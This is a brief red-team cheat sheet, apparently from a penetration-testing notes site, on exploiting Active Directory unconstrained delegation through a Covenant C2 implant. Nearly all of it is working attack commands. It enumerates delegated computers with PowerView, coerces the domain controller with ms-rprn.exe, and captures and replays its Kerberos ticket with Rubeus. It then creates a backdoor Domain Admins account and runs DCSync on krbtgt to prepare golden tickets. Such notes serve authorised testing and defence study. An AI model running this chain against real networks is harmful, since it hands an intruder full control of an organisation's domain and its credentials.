Unconstrained Delegation
This means that the computer is trusted to delegate any service.
Enumeration
Here we assume we have a high integrity grunt in Covenant with a computer that has unconstrained delegation, we can check this using this command:
powershell get-netcomputer -unconstrained -properties dnshostname
Here is what the result looks like, so we have Workstation-01 that has unconstrained Delegationdnshostname ----------- DC01.domain.local WORKSTATION-01.domain.local
Exploitation
We upload ms-rprn.exe with the Covenant
upload
command to our targetWe run it
shell ms-rprn.exe \\dc01 \\workstation-01
run
rubeus dump /service:krbtgt
here we will want to copy and keep aside the DC01 Base64EncodedTicketmaketoken adminsitrator domain type-any-string-here
rubeus ptt /ticket PASTE-HERE-DC01-Base64EncodedTicket
We should now be able to create a new user and add it to the Domain Admins
shell net user user SafePass1! /add /domain shell net group "Domain Admins" user /add /domain
dcsync domain\krbtgt
We will need this if we want to do a golden ticket
Last updated